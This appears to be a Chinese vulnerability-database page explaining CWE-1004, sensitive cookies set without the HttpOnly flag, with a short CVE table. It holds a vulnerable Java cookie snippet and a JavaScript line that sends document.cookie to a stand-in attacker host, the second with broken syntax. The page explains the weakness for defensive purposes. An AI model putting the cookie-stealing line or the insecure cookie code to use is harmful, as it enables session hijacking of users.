CWE-1004 没有’HttpOnly’标志的敏感Cookie 类弱点 32 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-1004 属于敏感信息泄露类漏洞,指应用程序在存储敏感数据的 Cookie 中未设置 HttpOnly 标志。攻击者常利用跨站脚本(XSS)漏洞窃取该 Cookie,从而获取会话令牌或敏感凭证,进而接管用户账户。开发者应在生成 Cookie 时显式启用 HttpOnly 属性,禁止客户端脚本访问,并结合 Secure 和 SameSite 属性,以有效防止敏感数据被恶意脚本读取或滥用。
String sessionID = generateSessionId(); Cookie c = new Cookie("session_id", sessionID); response.addCookie(c);
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'
| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2020-6267 | SAP Disclosure Management 跨站脚本漏洞 — SAP Disclosure Management | 6.5 | - | 2020-07-14 |
| CVE-2019-8283 | Gemalto Admin Control Center 信息泄露漏洞 — Sentinel LDK RTE | 6.5 | - | 2019-06-07 |
CWE-1004(没有’HttpOnly’标志的敏感Cookie) 是常见的弱点类别,本平台收录该类弱点关联的 32 条 CVE 漏洞。